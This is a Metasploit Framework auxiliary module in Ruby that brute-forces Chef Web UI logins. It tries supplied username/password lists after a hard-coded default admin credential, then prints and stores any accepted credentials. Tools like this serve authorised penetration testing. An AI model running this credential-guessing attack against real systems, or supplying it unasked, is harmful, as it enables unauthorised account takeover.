
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/chef_webui_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/chef_webui'
require 'metasploit/framework/credential_collection'
# Auxiliary scanner that tries username/password pairs against a Chef Web UI
# login page and records the outcome of every attempt through the framework's
# credential reporting helpers.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Declares the module metadata (SSL enabled by default) and registers the
  # RPORT, USERNAME, PASSWORD and TARGETURI options.
  def initialize
    super(
      'Name' => 'Chef Web UI Brute Force Utility',
      'Description' => %q{
        This module attempts to login to Chef Web UI server instance using username and password
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
        will also test for the default login (admin:p@ssw0rd1).
      },
      'Author' => ['hdm'],
      'License' => MSF_LICENSE,
      'DefaultOptions' => { 'SSL' => true }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
        OptString.new('TARGETURI', [true, 'The path to the Chef Web UI application', '/'])
      ]
    )
  end

  # Per-host entry point: builds the login scanner, stops with an error line
  # when the scanner's setup check returns a message, otherwise starts the
  # credential loop.
  #
  # @param ip [String] address of the host being scanned
  def run_host(ip)
    init_loginscanner(ip)

    setup_error = @scanner.check_setup
    if setup_error
      print_brute level: :error, ip: rhost, msg: setup_error
      return
    end

    print_brute level: :status, ip: rhost, msg: "Found Chef Web UI application at #{datastore['TARGETURI']}"
    bruteforce(ip)
  end

  # Runs the scanner and handles each attempt by its status: accepted
  # credentials are printed and stored, failed or unreachable attempts are
  # recorded as invalid logins.
  #
  # @param ip [String] address of the host being scanned
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    @scanner.scan! do |result|
      case result.status
      when login_status::SUCCESSFUL
        # The accepted credential is echoed to the console as well as stored.
        print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}'"
        do_report(ip, rport, result)
        :next_user
      when login_status::DENIED_ACCESS
        # Credentials were accepted but the login was refused; still stored.
        print_brute level: :status, ip: ip, msg: "Correct credentials, but unable to login: '#{result.credential}'"
        do_report(ip, rport, result)
        :next_user
      when login_status::UNABLE_TO_CONNECT
        print_brute level: :verror, ip: ip, msg: "Could not connect" if datastore['VERBOSE']
        record_failed_attempt(ip, result)
        :abort
      when login_status::INCORRECT
        print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'" if datastore['VERBOSE']
        record_failed_attempt(ip, result)
      end
    end
  end

  # Stores a credential and the login it was used for, both tied to the HTTP
  # service on the given address and port in the current workspace. The
  # secret is recorded with private_type :password.
  #
  # @param ip [String] service address
  # @param port [Integer] service port
  # @param result [Object] scanner result carrying the credential and status
  def do_report(ip, port, result)
    service = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    core = create_credential(
      {
        module_fullname: fullname,
        origin_type: :service,
        private_data: result.credential.private,
        private_type: :password,
        username: result.credential.public
      }.merge(service)
    )

    create_credential_login(
      {
        core: core,
        last_attempted_at: DateTime.now,
        status: result.status
      }.merge(service)
    )
  end

  # Builds the credential collection from the USERNAME/PASSWORD options, puts
  # the default admin login at the front, and creates the Chef Web UI login
  # scanner in @scanner.
  #
  # @param ip [String] address of the host being scanned (not read here)
  def init_loginscanner(ip)
    @cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    # The default pair is attempted before anything the operator supplied.
    default_cred = Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')
    @cred_collection.prepend_cred(default_cred)

    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(
      configure_http_login_scanner(
        uri: datastore['TARGETURI'],
        cred_details: @cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5, # fixed value, not exposed as a module option
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword']
      )
    )
  end

  private

  # Records an attempt that did not authenticate (wrong credentials or no
  # connection) as an invalid login for the TCP service on ip:rport.
  #
  # @param ip [String] service address
  # @param result [Object] scanner result carrying the credential and status
  def record_failed_attempt(ip, result)
    tried = result.credential
    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: tried.public,
      private: tried.private,
      realm_key: tried.realm_key,
      realm_value: tried.realm,
      status: result.status
    )
  end
end